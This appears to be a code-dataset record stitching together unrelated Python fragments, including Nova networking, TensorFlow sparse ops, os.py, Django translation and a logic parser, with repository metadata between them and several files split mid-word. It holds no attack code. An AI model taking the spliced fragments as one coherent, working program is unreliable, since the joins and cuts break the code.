QUOTAS.rollback(context, reservation)
try:
self.network_api.delete(context, id)
except exception.PolicyNotAuthorized as e:
_rollback_quota(reservation)
raise exc.HTTPForbidden(explanation=six.text_type(e))
except exception.NetworkInUse as e:
_rollback_quota(reservation)
raise exc.HTTPConflict(explanation=e.format_message())
except exception.NetworkNotFound:
_rollback_quota(reservation)
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
if CONF.enable_network_quota and reservation:
QUOTAS.commit(context, reservation)
@extensions.expected_errors((400, 403, 503))
def create(self, req, body):
if not body:
_msg = _("Missing request body")
raise exc.HTTPBadRequest(explanation=_msg)
context = req.environ["nova.context"]
authorize(context)
network = body["network"]
keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
"num_networks"]
kwargs = {k: network.get(k) for k in keys}
label = network["label"]
if not (kwargs["cidr"] or kwargs["cidr_v6"]):
msg = _("No CIDR requested")
raise exc.HTTPBadRequest(explanation=msg)
if kwargs["cidr"]:
try:
net = netaddr.IPNetwork(kwargs["cidr"])
if net.size < 4:
msg = _("Requested network does not contain "
"enough (2+) usable hosts")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrFormatError:
msg = _("CIDR is malformed.")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrConversionError:
msg = _("Address could not be converted.")
raise exc.HTTPBadRequest(explanation=msg)
networks = []
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many networks.")
raise exc.HTTPBadRequest(explanation=msg)
try:
networks = self.network_api.create(context,
label=label, **kwargs)
if CONF.enable_network_quota:
QUOTAS.commit(context, reservation)
except exception.PolicyNotAuthorized as e:
raise exc.HTTPForbidden(explanation=six.text_type(e))
except Exception:
if CONF.enable_network_quota:
QUOTAS.rollback(context, reservation)
msg = _("Create networks failed")
LOG.exception(msg, extra=network)
raise exc.HTTPServiceUnavailable(explanation=msg)
return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
"""Tenant-based Network Management Extension."""
name = "TenantNetworks"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS, TenantNetworkController())
return [ext]
def get_controller_extensions(self):
return []
def _sync_networks(context, project_id, session):
ctx = nova_context.RequestContext(user_id=None, project_id=project_id)
ctx = ctx.elevated()
networks = nova.network.api.API().get_all(ctx)
return dict(networks=len(networks))
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableReso
|
urce('networks',
|
_sync_networks,
'quota_networks'
|
tensorflow/graphics
|
tensorflow_graphics/geometry/__init__.py
|
Python
|
apache-2.0
| 1,274
| 0.005495
|
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Ver
|
sion 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distr
|
ibuted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
rafa1231518/CommunityBot
|
plugins/gabenizer/mentions.py
|
Python
|
gpl-3.0
| 499
| 0.02004
|
#!/bin/pytho
|
n2
# Script that replies to username mentions.
import time
import os
import cPickle
import sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
image = gabenizer.process_image(sys.argv[1], './pl
|
ugins/gabenizer/gabenface.png')
image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
main()
|
eaplatanios/tensorflow
|
tensorflow/python/ops/sparse_ops.py
|
Python
|
apache-2.0
| 82,052
| 0.002803
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Sparse Tensor Representation. See the @{$python/sparse_ops} guide.
@@SparseTensor
@@SparseTensorValue
@@sparse_to_dense
@@sparse_tensor_to_dense
@@sparse_to_indicator
@@sparse_merge
@@sparse_concat
@@sparse_reorder
@@sparse_reshape
@@sparse_slice
@@sparse_split
@@sparse_retain
@@sparse_reset_shape
@@sparse_fill_empty_rows
@@sparse_transpose
@@sparse_reduce_max
@@sparse_reduce_max_sparse
@@sparse_reduce_sum
@@sparse_reduce_sum_sparse
@@sparse_add
@@sparse_softmax
@@sparse_tensor_dense_matmul
@@sparse_maximum
@@sparse_minimum
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numbers
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_sparse_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
def _convert_to_sparse_tensor(sp_input):
"""Convert `sp_input` to `SparseTensor` and return it.
Args:
sp_input: `SparseTensor` or `SparseTensorValue`.
Returns:
`sp_input` converted to `SparseTensor`.
Raises:
ValueError: if `sp_input` is neither `SparseTensor` nor `SparseTensorValue`.
"""
if isinstance(sp_input, sparse_tensor.SparseTensorValue):
return sparse_tensor.SparseTensor.from_value(sp_input)
if not isinstance(sp_input, sparse_tensor.SparseTensor):
raise TypeError("Input must be a SparseTensor.")
return sp_input
def _convert_to_sparse_tensors(sp_inputs):
"""Convert `sp_inputs` to `SparseTensor` objects and return them.
Args:
sp_inputs: `list` or `tuple` of `SparseTensor` or `SparseTensorValue`
objects.
Returns:
`sp_inputs` converted to `SparseTensor` objects.
Raises:
ValueError: if any item in `sp_inputs` is neither `SparseTensor` nor
`SparseTensorValue`.
"""
if isinstance(sp_inputs, list):
return [_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs]
if isinstance(sp_inputs, tuple):
return (_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs)
raise TypeError("Inputs must be a list or tuple.")
# pylint: disable=protected-access
@tf_export("sparse_concat")
def sparse_concat(axis,
sp_inputs,
name=None,
expand_nonconcat_dim=False,
concat_dim=None):
"""Concatenates a list of `SparseTensor` along the specified dimension.
Concatenation is with respect to the dense versions of each sparse input.
  It is assumed that each input is a `SparseTensor` whose elements are ordered
along increasing dimension number.
If expand_nonconcat_dim is False, all inputs' shapes must match, except for
the concat dimension. If expand_nonconcat_dim is True, then inputs' shapes are
allowed to vary among all inputs.
The `indices`, `values`, and `shapes` lists must have the same length.
If expand_nonconcat_dim is False, then the output shape is identical to the
inputs', except along the concat dimension, where it is the sum of the inputs'
sizes along that dimension.
If expand_nonconcat_dim is True, then the output shape along the non-concat
dimensions will be expand to be the largest among all inputs, and it is the
sum of the inputs sizes along the concat dimension.
The output elements will be resorted to preserve the sort order along
increasing dimension number.
This op runs in `O(M log M)` time, where `M` is the total number of non-empty
values across all inputs. This is due to the need for an internal sort in
order to concatenate efficiently across an arbitrary dimension.
For example, if `axis = 1` and the inputs are
sp_inputs[0]: shape = [2, 3]
[0, 2]: "a"
[1, 0]: "b"
[1, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
then the output will be
shape = [2, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[1, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b c ] [ ] [b c ]
Another example, if 'axis = 1' and the inputs are
    sp_inputs[0]: shape = [3, 3]
[0, 2]: "a"
[1, 0]: "b"
[2, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
if expand_nonconcat_dim = False, this will result in an error. But if
expand_nonconcat_dim = True, this will result in:
shape = [3, 7]
    [0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[2, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b ] [ ] [b ]
[ c ] [ c ]
Args:
axis: Dimension to concatenate along. Must be in range [-rank, rank),
where rank is the number of dimensions in each input `SparseTensor`.
sp_inputs: List of `SparseTensor` to concatenate.
name: A name prefix for the returned tensors (optional).
expand_nonconcat_dim: Whether to allow the expansion in the non-concat
dimensions. Defaulted to False.
concat_dim: The old (deprecated) name for axis.
Returns:
A `SparseTensor` with the concatenated output.
Raises:
TypeError: If `sp_inputs` is not a list of `SparseTensor`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "concat_dim",
concat_dim)
sp_inputs = _convert_to_sparse_tensors(sp_inputs)
if len(sp_inputs) == 1: # Degenerate case of one tensor.
return sp_inputs[0]
inds = [sp_input.indices for sp_input in sp_inputs]
vals = [sp_input.values for sp_input in sp_inputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_shape[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
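# For illustration: concatenating the two SparseTensors from the docstring
# example above along axis=1 (assumes a TF 1.x session or eager execution to
# materialize the result):
#
#   st_a = sparse_tensor.SparseTensor(indices=[[0, 2], [1, 0], [1, 1]],
#                                     values=["a", "b", "c"], dense_shape=[2, 3])
#   st_b = sparse_tensor.SparseTensor(indices=[[0, 1], [0, 2]],
#                                     values=["d", "e"], dense_shape=[2, 4])
#   st_ab = sparse_concat(axis=1, sp_inputs=[st_a, st_b])
#   # st_ab.dense_shape == [2, 7]; the columns of st_b are shifted right by 3.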
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
"""Adds two tensors, at least one of each is a `SparseTensor`.
If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
of arguments does not matter. Use vanilla `tf.add()` for adding two dense
`Tensor`s.
The shapes of the two operands must match: broadcasting is not supported.
The indices of any input `SparseTensor` are assumed ordered in standard
lexicographic order. If this is not the case, before this step
MicroTrustRepos/microkernel | src/l4/pkg/python/contrib/Lib/os.py | Python | gpl-2.0 | 26,337 | 0.003038
r"""OS routines for Mac, NT, or Posix depending on what system we're on.
This exports:
- all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.
- os.path is one of the modules posixpath, or ntpath
- os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'
- os.curdir is a string representing the current directory ('.' or ':')
- os.pardir is a string representing the parent directory ('..' or '::')
- os.sep is the (or a most common) pathname separator ('/' or ':' or '\\')
- os.extsep is the extension separator ('.' or '/')
- os.altsep is the alternate pathname separator (None or '/')
- os.pathsep is the component separator used in $PATH etc
- os.linesep is the line separator in text files ('\r' or '\n' or '\r\n')
- os.defpath is the default search path for executables
- os.devnull is the file path of the null device ('/dev/null', etc.)
Programs that import and use 'os' stand a better chance of being
portable between different platforms. Of course, they must then
only use functions that are defined by all platforms (e.g., unlink
and opendir), and leave all pathname manipulation to os.path
(e.g., split and join).
"""
#'
import sys, errno
_names = sys.builtin_module_names
# Note: more names are added to __all__ later.
__all__ = ["altsep", "curdir", "pardir", "sep", "extsep", "pathsep", "linesep",
"defpath", "name", "path", "devnull",
"SEEK_SET", "SEEK_CUR", "SEEK_END"]
def _get_exports_list(module):
try:
return list(module.__all__)
except AttributeError:
return [n for n in dir(module) if n[0] != '_']
if 'posix' in _names:
name = 'posix'
linesep = '\n'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath as path
import posix
__all__.extend(_get_exports_list(posix))
del posix
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
from nt import *
try:
from nt import _exit
except ImportError:
pass
import ntpath as path
import nt
__all__.extend(_get_exports_list(nt))
del nt
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
if sys.version.find('EMX GCC') == -1:
import ntpath as path
else:
import os2emxpath as path
from _emx_link import link
import os2
__all__.extend(_get_exports_list(os2))
del os2
elif 'ce' in _names:
name = 'ce'
linesep = '\r\n'
from ce import *
try:
from ce import _exit
except ImportError:
pass
# We can use the standard Windows path.
import ntpath as path
import ce
__all__.extend(_get_exports_list(ce))
del ce
elif 'riscos' in _names:
name = 'riscos'
linesep = '\n'
from riscos import *
try:
from riscos import _exit
except ImportError:
pass
import riscospath as path
import riscos
__all__.extend(_get_exports_list(riscos))
del riscos
else:
raise ImportError, 'no os specific module found'
sys.modules['os.path'] = path
from os.path import (curdir, pardir, sep, pathsep, defpath, extsep, altsep,
devnull)
del _names
# Python uses fixed values for the SEEK_ constants; they are mapped
# to native constants if necessary in posixmodule.c
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
#'
# Super directory utilities.
# (Inspired by Eric Raymond; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777])
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
if head and tail and not path.exists(head):
try:
makedirs(head, mode)
except OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == curdir: # xxx/newdir/. exists if xxx/newdir exists
return
mkdir(name, mode)
def removedirs(name):
"""removedirs(path)
Super-rmdir; remove a leaf directory and all empty intermediate
ones. Works like rmdir except that, if the leaf directory is
successfully removed, directories corresponding to rightmost path
segments will be pruned away until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new)
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
path segments of the old name will be pruned way until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
__all__.extend(["makedirs", "removedirs", "renames"])
def walk(top, topdown=True, onerror=None, followlinks=False):
"""Directory tree generator.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), yields a 3-tuple
dirpath, dirnames, filenames
dirpath is a string, the path to the directory. dirnames is a list of
the names of the subdirectories in dirpath (excluding '.' and '..').
filenames is a list of the names of the non-directory files in dirpath.
Note that the names in the lists are just names, with no path components.
To get a full path (which begins with top) to a file or directory in
dirpath, do os.path.join(dirpath, name).
If optional arg 'topdown' is true or not specified, the triple for a
directory is generated before the triples for any of its subdirectories
(directories are generated top down). If topdown is false, the triple
for a directory is generated after the triples for all of its
subdirectories (directories are generated bottom up).
When topdown is true, the caller can modify the dirnames list in-place
(e.g., via del or slice assignment), and walk will only recurse into the
subdirectories whose names remain in dirnames; this can be used to prune
the search, or to impose a specific order of visiting. Modifying
dirnames when topdown is false is ineffective, since the directories in
    dirnames have already been generated by the time dirnames itself is
generated.
By default errors from the os.listdir() call are ignored. If
optional arg 'onerror' is specified, it should be a function; it
will be called with one argument, an os.error instance. It can
report the error to continue with the walk, or raise the exception
    to abort the walk. Note that the filename is available as the
filename attribute of the exception object.
By default, os.walk does not follow symbolic links to subdirectories on
systems that support them. In order to get this functionality, set the
optional argument 'followlinks' to true.
Caution: if you pass a relative pathname for top, don't change the
current working directory between resumptions of walk. walk never
changes the current directory, and
ChinaMassClouds/copenstack-server | openstack/src/nova-2014.2/nova/objects/agent.py | Python | gpl-2.0 | 2,828 | 0
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
VERSION = '1.0'
fields = {
'id': fields.IntegerField(read_only=True),
'hypervisor': fields.StringField(),
'os': fields.StringField(),
'architecture': fields.StringField(),
'version': fields.StringField(),
'url': fields.StringField(),
'md5hash': fields.StringField(),
}
@staticmethod
def _from_db_object(context, agent, db_agent):
for name in agent.fields:
agent[name] = db_agent[name]
agent._context = context
agent.obj_reset_changes()
return agent
@base.remotable_classmethod
def get_by_triple(cls, context, hypervisor, os, architecture):
db_agent = db.agent_build_get_by_triple(context, hypervisor,
os, architecture)
if not db_agent:
return None
return cls._from_db_object(context, objects.Agent(), db_agent)
@base.remotable
def create(self, context):
updates = self.obj_get_changes()
if 'id' in updates:
raise exception.ObjectActionError(action='create',
reason='Already Created')
db_agent = db.agent_build_create(context, updates)
self._from_db_object(context, self, db_agent)
@base.remotable
def destroy(self, context):
db.agent_build_destroy(context, self.id)
@base.remotable
def save(self, context):
updates = self.obj_get_changes()
db.agent_build_update(context, self.id, updates)
self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('Agent'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context, hypervisor=None):
db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
return base.obj_make_list(context, cls(), objects.Agent, db_agents)
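# For illustration only (hypothetical values): a typical lifecycle of an Agent
# record, assuming `ctxt` is a valid request context.
#
#   agent = objects.Agent()
#   agent.hypervisor = 'xen'
#   agent.os = 'linux'
#   agent.architecture = 'x86_64'
#   agent.version = '1.0'
#   agent.url = 'http://example.com/agent-1.0.tgz'
#   agent.md5hash = 'd41d8cd98f00b204e9800998ecf8427e'
#   agent.create(ctxt)        # inserts the row; 'id' is filled in by the DB
#   agent.version = '1.1'
#   agent.save(ctxt)          # persists only the changed fields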
italopaiva/propositional-logic | lp/syntax.py | Python | mit | 7,307 | 0.002874
"""Describe the language syntax."""
import re
class Symbol:
"""Describes the language symbols."""
# General pattern of formulas
pattern = '([a-z0-9&\-\|><\(\)]*)'
accepted_chars = '([a-z0-9&\-\|><\(\)]*)'
def __init__(self, value):
"""Init a propositional symbol."""
self.value = value
@classmethod
def check(cls, symbol):
"""Check if the given arg is a symbol."""
regexp = re.compile(r'^%s$' % cls.pattern)
return regexp.match(symbol)
@classmethod
def accepts_initial_char(cls, char):
"""Check if the operator accepts the given char as initial char."""
regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
return regexp.match(char)
def is_a(self, cls):
"""Check if this token is a given type."""
return isinstance(self, cls)
def __str__(self):
"""Return the symbol value as str."""
return self.value
class PropositionalSymbol(Symbol):
"""
Describes the propositional symbols of the language.
The propositional symbols are represented by any
lowercase letter, followed or not by an integer index.
Examples:
p, p1, q23, r1890
"""
accepted_initial_char = '[a-z]'
pattern = '([a-z]{1}[0-9]*)'
def subformulas(self):
"""
Get the formula subformulas.
Return itself as it is a propositional symbol.
"""
return [self]
def str_representation(self):
"""String representation of the symbol."""
return self.value
def evaluate(self, symbol_values):
"""Evaluate symbol with given values."""
return symbol_values[self.str_representation()]
def count_terms(self):
"""Count the terms of the formula."""
return 1
class PontuationSymbol(Symbol):
"""
Describes the pontuation symbols of the language.
The pontuation symbols are represented by the
opening and closing parenthesis.
"""
pattern = '([\(\)])'
class OpeningParenthesis(PontuationSymbol):
"""Describes the opening parenthesis."""
accepted_initial_char = '\('
pattern = '\('
class ClosingParenthesis(PontuationSymbol):
"""Describes the closing parenthesis."""
accepted_initial_char = '\)'
pattern = '\)'
class Operator(Symbol):
"""Base class for language operators."""
class Associativity:
"""Possible operators associativity."""
LEFT = 1
RIGHT = 0
def subformulas(self):
"""Get the formula subformulas."""
raise NotImplementedError
def evaluate(self, symbol_values):
"""Evaluate an operator with given values."""
raise NotImplementedError
def __str__(self):
"""Return the string representation as str."""
return self.str_representation()
class BinaryOperator(Operator):
"""Describe binary operators."""
def set_args(self, arg1, arg2):
"""Set the operator args."""
self.arg1 = arg1
self.arg2 = arg2
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its first and second args.
"""
return self.arg1.subformulas() + self.arg2.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol) or (
self.arg1.is_a(Operator) and
self.precendence <= self.arg1.precendence
):
# In this case do not need parenthesis
arg1_repr = self.arg1.str_representation()
else:
arg1_repr = '(' + self.arg1.str_representation() + ')'
if self.arg2.is_a(PropositionalSymbol) or (
self.arg2.is_a(Operator) and
self.precendence <= self.arg2.precendence
):
            arg2_repr = self.arg2.str_representation()
else:
arg2_repr = '(' + self.arg2.str_representation() + ')'
return arg1_repr + self.SYMBOL + arg2_repr
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
"""Describe unary operators."""
def set_arg(self, arg):
"""Set the operator arg."""
self.arg1 = arg
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its arg.
"""
return self.arg1.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol):
return self.SYMBOL + self.arg1.str_representation()
else:
return self.SYMBOL + '(' + self.arg1.str_representation() + ')'
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
"""Describe the negation operator."""
SYMBOL = '-'
accepted_initial_char = '\-'
pattern = '\-'
precendence = 6
associativity = Operator.Associativity.RIGHT
def evaluate(self, symbol_values):
"""Evaluate a negation with given values."""
return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
"""Describe the conjunction operator."""
SYMBOL = '&'
accepted_initial_char = '&'
pattern = '&'
precendence = 5
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a conjunction with given values."""
return (self.arg1.evaluate(symbol_values) and
self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
"""Describe the disjunction operator."""
SYMBOL = '|'
accepted_initial_char = '\|'
pattern = '\|'
precendence = 4
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a disjunction with given values."""
return (self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
"""Describe the implication operator."""
SYMBOL = '->'
accepted_initial_char = '\-'
pattern = '\->'
precendence = 3
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate an implication with given values.
To do the trick: p -> q = -p | q
"""
return (not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
"""Describe the bi-implication operator."""
SYMBOL = '<->'
accepted_initial_char = '<'
pattern = '<\->'
precendence = 2
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate a bi-implication with given values.
To do the trick: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
"""
return (
not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values)
) and (
not self.arg2.evaluate(symbol_values) or
self.arg1.evaluate(symbol_values)
)
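# For illustration: building and evaluating (p & q) -> r with the classes above
# (the variable names and values are only example inputs).
#
#   p, q, r = PropositionalSymbol('p'), PropositionalSymbol('q'), PropositionalSymbol('r')
#   conj = Conjunction('&')
#   conj.set_args(p, q)
#   impl = Implication('->')
#   impl.set_args(conj, r)
#   impl.str_representation()                          # 'p&q->r' (no redundant parentheses)
#   impl.evaluate({'p': True, 'q': True, 'r': False})  # False
#   impl.count_terms()                                 # 5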
aarpon/obit_microscopy_core_technology | core-plugins/microscopy/3/dss/drop-boxes/MicroscopyDropbox/GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm.py | Python | apache-2.0 | 1,343 | 0.005957
# -*- coding: utf-8 -*-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
'''
Custom MaximumIntensityProjectionGenerationAlgorithm for Generic TIFF Series
that makes sure that the first timepoint in a series is registered for
creation of the representative thumbnail.
'''
def __init__(self, datasetTypeCode, width, height, filename):
"""
Constructor
"""
# Call the parent base constructor
MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
datasetTypeCode, width, height, filename)
def imageToBeIgnored(self, image):
"""
Overrides the parent imageToBeIgnored method. The selection of which
series should be used to create the representative thumbnail is done
in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
to make a decision based on the timepoint (== 0), since we cannot know
which is the first time point in a Generic TIFF Series.
"""
return False
javiteri/reposdmpdos | miltonvz/run.py | Python | gpl-2.0 | 176 | 0.005682
'''
Created on 17/2/2015
@author: PC06
First change to the project
'''
from include import app
if __name__ == '__main__':
    app.run("127.0.0.1", 9000, debug=True)
greggian/TapdIn | django/utils/translation/trans_real.py | Python | apache-2.0 | 20,192 | 0.00213
"""Translation helper functions."""
import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO
from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread
# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}
# The default translation is based on the settings file.
_default = None
# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower()+'_'+language[p+1:].lower()
else:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower()+'-'+locale[p+1:].lower()
else:
return locale.lower()
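# Worked example of the two helpers above:
#   to_locale('en-us')                 -> 'en_US'
#   to_locale('en-us', to_lower=True)  -> 'en_us'
#   to_language('en_US')               -> 'en-us'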
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset. Django uses a defined DEFAULT_CHARSET as the output charset on
Python 2.4. With Python 2.3, use DjangoTranslation23.
"""
def __init__(self, *args, **kw):
from django.conf import settings
gettext_module.GNUTranslations.__init__(self, *args, **kw)
# Starting with Python 2.4, there's a function to define
# the output charset. Before 2.4, the output charset is
# identical with the translation file charset.
try:
self.set_output_charset('utf-8')
except AttributeError:
pass
self.django_output_charset = 'utf-8'
self.__language = '??'
def merge(self, other):
self._catalog.update(other._catalog)
def set_language(self, language):
self.__language = language
def language(self):
return self.__language
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslation23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
return res.encode(self.django_output_charset)
def translation(language):
"""
Returns a translation object.
This translation object will be constructed out of multiple GNUTranslations
    objects by merging their catalogs. It will construct an object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
global _translations
t = _translations.get(language, None)
if t is not None:
return t
from django.conf import settings
# set up the right translation class
klass = DjangoTranslation
